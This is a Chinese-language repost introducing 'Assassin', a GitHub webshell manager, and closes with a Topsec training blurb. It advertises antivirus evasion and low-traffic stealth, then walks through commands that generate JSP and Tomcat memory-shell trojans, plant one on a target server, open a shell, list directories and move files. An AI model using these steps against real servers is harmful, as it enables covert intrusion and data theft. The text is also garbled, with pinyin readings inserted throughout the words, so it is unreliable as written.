項(xiàng)目作者：b1ackc4t

項(xiàng)目地址：https://github.com/b1ackc4t/Assassin

一、工具介紹

Assassin是一款精簡的基于命令行的webshell管理工具，它有著多種payload發(fā)送方式和編碼方式，以及精簡的payload代碼，使得它成為隱蔽的暗殺者，難以被很好的防御。工具短小精悍，生成的webshell能夠過常見殺軟，盡量減少了連接后交互的流量特征，具體payload發(fā)送方式均可自定義。由于個人精力有限（因?yàn)閼卸也耍?wù)端暫時僅支持Java。

二、安裝與使用

1、用startup.bat或startup.sh啟動，之后會彈出窗口選擇保存位置

new java 123 cookie# 生成密碼為123 發(fā)送方式為cookie的普通jsp木馬new java pass post reqEncode=base36 tamper=tomcat9_filter# 生成密碼為pass 發(fā)送方式為post 請求用base36編碼的tomcat9 filter內(nèi)存馬

2、將webshell上到目標(biāo)服務(wù)器

add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36# 添加webshell 密碼123 java馬 cookie傳參 請求編碼默認(rèn)base64 響應(yīng)編碼base36

3、show查看ID號

4、session 1連接webshell

5、看到提示符發(fā)生變化就可以執(zhí)行webshell controller commands的命令了

Assassin|java >getshell

Assassin|java|C:\apache-tomcat-9.0.54\bin >dir

6、上傳文件

upload # 沒參數(shù)默認(rèn)傳到當(dāng)前目錄，選擇文件即可上傳

7、下載文件

download ./test.txt同理

三、下載地址：

通過項(xiàng)目地址下載：

https://github.com/b1ackc4t/Assassin

四、聲明：

僅供安全研究與學(xué)習(xí)之用，若將工具做其他用途，由使用者承擔(dān)全部法律及連帶責(zé)任，作者不承擔(dān)任何法律及連帶責(zé)任。

TOPSEC

十年樹木，百年樹人。未來，天融信將始終積極探索，不斷延展網(wǎng)絡(luò)安全人才培養(yǎng)的寬度和深度，為網(wǎng)絡(luò)安全人才培養(yǎng)與產(chǎn)業(yè)發(fā)展貢獻(xiàn)企業(yè)力量。